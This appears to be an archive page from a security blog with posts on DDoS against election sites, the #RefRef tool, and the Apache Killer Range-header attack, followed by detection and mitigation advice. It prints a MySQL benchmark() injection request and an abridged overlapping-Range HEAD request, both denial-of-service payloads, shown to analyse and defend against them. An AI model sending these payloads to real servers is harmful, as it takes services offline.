DDoS and Elections

Posted May 10th, 2012 by

I’ve noticed a trend over the past 6 months: DDoS traffic associated with elections.  A quick sampling of news will show the following:

Last week it picked up again with the re-inauguration of Vladimir Putin.

And then yesterday, Ustream and their awesome response: which, in the Rybolov-paraphrased version read something like: “We shall go on to the end. We shall fight in France, we shall fight on the Interblagosphere, we shall fight with growing confidence and growing strength in our blocking capabilities, we shall defend our videostreams, whatever the cost may be. We shall fight on the routers, we shall fight on the load balancers, we shall fight in the applications and in the databases, we shall fight by building our own Russian subsite; we shall never surrender!!!!1111” (Ref)

Afghanistan Presidential Election 2004

Afghanistan Presidential Elections 2004 photo by rybolov.

So why all this political activity?  A couple of reasons that I can point to:

  • Elections are a point-in-time.  It’s critical for one day.  Anything that has a short window of time is a good DDoS target.
  • DDoS is easy to do.  Especially for the Russians.  Some of them already have big botnets they’re using for other things.
  • Other DDoS campaigns.  Chaotic Actors (Anonymous and their offshoots and factions) have demonstrated that DDoS has at a minimum PR value and at the maximum financial and political value.
  • Campaign sites are usually put up very quickly.  They don’t have much supporting infrastructure and full/paid/professional staffing.
  • Elections are IRL Flash Mobs.  Traffic to a campaign site increases slowly at first then exponentially the closer you get to the day of the election.  This stresses what infrastructure is in place and design ideas that seemed good at the time but that don’t scale with the increased load.

So is this the future of political campaigns?  I definitely think it is.  Just like any other type of web traffic, as soon as somebody figures out how to use the technology for their benefit (information sharing => eCommerce => online banking => political fundraising), a generation later somebody else figures out how to deny that benefit.

How to combat election DDoS:

  • Have a plan.  You know that the site is going to get flooded the week of the election.  Prepare accordingly.  *ahem* Expect them.
  • Tune applications and do caching at the database, application, webserver, load balancer, content delivery network, etc.
  • Throw out the dynamic site.  On election day, people just want to know a handful of things.  Put those on a static version of the site and switch to that.  Even if you have to publish by hand every 30 minutes, it’s better than taking a huge outage.
  • Manage the non-web traffic.  SYN and UDP floods have been around for years and years and still work in some cases.  For these attacks, you need lots of bandwidth and something that does blocking: these point to a service provider that offers DDoS protection.

It’s going to be an interesting November.



Similar Posts:

Posted in Cyberwar, DDoS, Hack the Planet | No Comments »
Tags:

#RefRef the Vaporware DoS Tool

Posted September 23rd, 2011 by

Ah yes, you now know how I spend my Saturday mornings lately.

i gotz up at 7AM for #RefRef and all i kan haz is this t-shirt?



Similar Posts:

Posted in DDoS, IKANHAZFIZMA | No Comments »
Tags:

A Little Story About a Tool Named #RefRef

Posted September 23rd, 2011 by

Let me tell you a little story.

So September 17th was Constitution Day and was celebrated by protestors in most major cities across the US with a sizable percentage of folks on Wall Street in NYC.  In conjunction with this protest, a new Denial-of-Service tool, #RefRef, was supposed to be released.  It supposedly used some SQL Injection techniques to put a file (originally listed as a JavaScript but Java is more believable) on application or database servers that then created massive amounts of OS load, thereby crippling the server.  The press coverage of the tool does have the quote of the year: ““Imagine giving a large beast a simple carrot, [and then] watching the best choke itself to death.”  Seriously?

Then came the 17th.  I checked the site, whoa, there is some perl code there.  Then I read it and it sounded nothing like the tool as described.  Rumor around the Intertubes was that #RefRef was/is a hoax and that the people responsible were collecting donations for R&D.

This is what we actually have for the tool that was released on the RefRef site does:

GET /%20and%20(select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)) HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12

The way this works is that it requests a large amount of benchmark queries against the database.  This is very similar to SQL Injection in that the request contains database commands which are then passed by the application server to the database.  In this case, the SQL command is “benchmark” which executes the query multiple times to build test performance of the query.  As you would guess, it generates a ton of database server load.  However, it’s only applicable to MySQL.



Similar Posts:

Posted in DDoS, Technical | No Comments »
Tags:

Training the Apache Killers

Posted September 2nd, 2011 by

Here at IKANHAZFIZMA, we’re training the next generation of Apache webserver Denial-of-Service gurus.  It involves punching bags, some nomz for the troops, and lots of requests for kibble.

ir in training



Similar Posts:

Posted in DDoS, IKANHAZFIZMA | No Comments »
Tags:

Apache Killer Effects on Target

Posted August 30th, 2011 by

Oh noes, the web is broken.  Again.  This time it’s the Apache Killer.  This inspired a little ditty from @CSOAndy based on a Talking Heads tune:

I can’t seem 2 handle the ranges

I’m forked & memlocked & I Can’t spawn

I can’t sleep ’cause my net’s afire

Don’t spawn me I’m a dead server

Apache Killer Qu’est-ce que c’est

da da da da da da da da da dos me now

Fork fork fork fork fork fork fork away

Going back to my blog post last week about Slow Denial-of-Service, let’s look at what Apache Killer is.  Yes kan haz packet capture for packet monkeys (caveat: 2.3MB worth of packets)

Home on the Range

The Apache vulnerability uses a HTTP header called “Range”.  Range is used for partial downloads, these are common in streaming video, in the “resume” feature for large downloads, and in some PDF/eDocument readers (Acrobat Reader does this in a big way).  That way, the client (which is almost never a web browser in this case) can request a specific byte range or multiple byte ranges of an object instead of requesting “the whole enchilada”.  This is actually a good thing because it reduces the amount of traffic coming from a webserver, that’s why it’s part of the HTTP spec.  However, the spec is broken in some ways:

  • It has no upper limit on the number of ranges in a request.
  • It has no way to specify that a webserver is only servicing a specific number of ranges (maybe with a 416 response code).
  • The spec allows overlapping ranges.

In the interests of science, I’ll provide a sample of Range request Apache combined logs so you can see how these work in the wild, have a look here and the command used to make this monstrosity was this: zcat /var/log/apache2/www.guerilla-ciso.com.access.log.*.gz | awk ‘($9 ~ /206/)’ | tail -n 500 > 206traffic.txt

Apache Killer

Now for what Apache Killer does.  You can go check out the code at the listing on the Full Disclosure Mailing List.  Basic steps for this tool:

  • Execute a loop to stitch together a Range header with multiple overlapping ranges
  • Stitch the Range into a HTTP request
  • Send the HTTP request via a net socket

The request looks like this, note that there are some logic errors in how the Range is stitched together, some of the ranges have start values that are after the end value if the start < 5 and the first range doesn’t have an end value:

HEAD / HTTP/1.1
Host: localhost
Range:bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,<rybolov deleted this for brevity’s sake>5-1293,5-1294,5-1295,5-1296,5-1297,5-1298,5-1299
Accept-Encoding: gzip
Connection: close

What The Apache Sees

So this brings us to the effect on target.  The normal behavior for a Range request is to do something like the following:

  • Load the object off disk (or from an application handler like php or mod_perl)
  • Return a 206 Partial Content
  • Respond with multiple objects to satisfy the ranges that were requested

In the case of Apache Killer, Apache responds in the following way:

HTTP/1.1 206 Partial Content
Date: Tue, 30 Aug 2011 01:00:28 GMT
Server: Apache/2.2.17 (Ubuntu)
Last-Modified: Tue, 30 Aug 2011 00:18:51 GMT
ETag: “c09c8-0-4abadf4c57e50”
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 123040
Connection: close
Content-Type: multipart/byteranges; boundary=4abae89a423c2199d

Of course, in trying to satisfy the Range request, apache loads the object into memory but then there is a huge amount of ranges and because the ranges are overlapping, Apache has to load a new version of the object to satisfy each byte range.  This results in a memory fork.  It also keeps that server process busy, resulting in a process fork attack like a Slow DoS would also do.

The Apache access log (on a Debian derivative it’s in /var/log/apache2/access.log )

127.0.0.1 – – [29/Aug/2011:18:00:34 -0700] “HEAD / HTTP/1.1” 206 353 “-” “-”
127.0.0.1 – – [29/Aug/2011:18:00:34 -0700] “HEAD / HTTP/1.1” 206 353 “-” “-”
127.0.0.1 – – [29/Aug/2011:18:00:34 -0700] “HEAD / HTTP/1.1” 206 354 “-” “-”
127.0.0.1 – – [29/Aug/2011:18:00:34 -0700] “HEAD / HTTP/1.1” 206 354 “-” “-”
127.0.0.1 – – [29/Aug/2011:18:00:34 -0700] “HEAD / HTTP/1.1” 206 353 “-” “-”
127.0.0.1 – – [29/Aug/2011:18:00:34 -0700] “HEAD / HTTP/1.1” 206 354 “-” “-”

Note that we’re giving a http response code of 206 (which is good) but there is no referrer or User-Agent.  Let’s filter that stuff out of a full referrer log with some simple shell scripting (this site has an awesome guide to parsing apache logs):

tail -n 500 access.log | awk ‘($9 ~ /206/ )’

which says this:

Grab the last 500 log lines.

Find everything that is a 206 response code.

For me, the output is 499 copies of the log lines I showed above because it’s a test VM with no real traffic.  On a production server, you might have to use the entire access log (not just the last 500 lines) to get a larger sample of traffic.

I’ll also introduce a new fun thing: Apache mod_status.  On a Debian-ish box, you have the command “apachectl status” which just does a simple request from the webserver asking for /server-status.

root@ubuntu:/var/log/apache2# apachectl status
Apache Server Status for localhost

Server Version: Apache/2.2.17 (Ubuntu)
Server Built: Feb 22 2011 18:34:09
__________________________________________________________________

Current Time: Monday, 29-Aug-2011 20:49:57 PDT
Restart Time: Monday, 29-Aug-2011 16:21:02 PDT
Parent Server Generation: 0
Server uptime: 4 hours 28 minutes 54 seconds
Total accesses: 5996 – Total Traffic: 637.5 MB
CPU Usage: u107.39 s2.28 cu0 cs0 – .68% CPU load
.372 requests/sec – 40.5 kB/second – 108.9 kB/request
1 requests currently being processed, 74 idle workers

_________________W_______…………………………………
……………………………………………………….
_________________________…………………………………
_________________________…………………………………
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….

Scoreboard Key:
“_” Waiting for Connection, “S” Starting up, “R” Reading Request,
“W” Sending Reply, “K” Keepalive (read), “D” DNS Lookup,
“C” Closing connection, “L” Logging, “G” Gracefully finishing,
“I” Idle cleanup of worker, “.” Open slot with no current process

The interesting part for me is the server process status codes.  In this case, I have one server (W)riting a reply (actually, servicing the status request since this is on a VM with no live traffic).  During an attack, all of the server process’s time is spent writing a response:

root@ubuntu:/var/log/apache2# apachectl status
Apache Server Status for localhost

Server Version: Apache/2.2.17 (Ubuntu)
Server Built: Feb 22 2011 18:34:09
__________________________________________________________________

Current Time: Monday, 29-Aug-2011 20:53:48 PDT
Restart Time: Monday, 29-Aug-2011 16:21:02 PDT
Parent Server Generation: 0
Server uptime: 4 hours 32 minutes 45 seconds
Total accesses: 7064 – Total Traffic: 760.8 MB
CPU Usage: u128.49 s2.65 cu0 cs0 – .801% CPU load
.432 requests/sec – 47.6 kB/second – 110.3 kB/request
51 requests currently being processed, 24 idle workers

___WW__WW__W_WW__W___WWW_…………………………………
……………………………………………………….
__WWWWW_W____WWW__WW_WWWW…………………………………
WWWWWWWWWWWWWWWWWWWWWWWWW…………………………………
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….

Scoreboard Key:
“_” Waiting for Connection, “S” Starting up, “R” Reading Request,
“W” Sending Reply, “K” Keepalive (read), “D” DNS Lookup,
“C” Closing connection, “L” Logging, “G” Gracefully finishing,
“I” Idle cleanup of worker, “.” Open slot with no current process

Now for a Slow HTTP DoS, you get some of the memory consumption and the Apache process forking out of control, but all of the server processes are stuck doing (R)ead operations (IE, reading a request from clients) if you can even get a response (the mod_status query is also an HTTP request which means you’re doing in-band management during a DoS attack).  This is interesting to me as an item that helps me differentiate the attacks from a troubleshooting standpoint.

Detecting and Mitigating

This is always the fun part.  Detection should be something like the following, all of these I’ve given examples in this blog post for you:

  • Apache forks new processes.  A simple “ps aux | grep apache | wc -l” compared with “grep MaxClients /etc/apache2/apache2.conf” should suffice.
  • Apache uses up tons of memory.  You can detect this using top, htop, or even ps.
  • Apache mod_status shows an excess of server daemons performing write options.
  • Apache combined access logs show an excess of 206 response code with no referrer and no User-Agent.

As far as mitigation, the Apache Project put out an awesome post on this, something I can’t really top on the server itself.



Similar Posts:

Posted in Hack the Planet, Technical | 1 Comment »
Tags:

Noms and IKANHAZFIZMA

Posted August 26th, 2011 by

Kickin’ it old-school with some kitteh overflows

iz noms stack overflow



Similar Posts:

Posted in IKANHAZFIZMA | No Comments »
Tags:

« Previous Entries


Visitor Geolocationing Widget: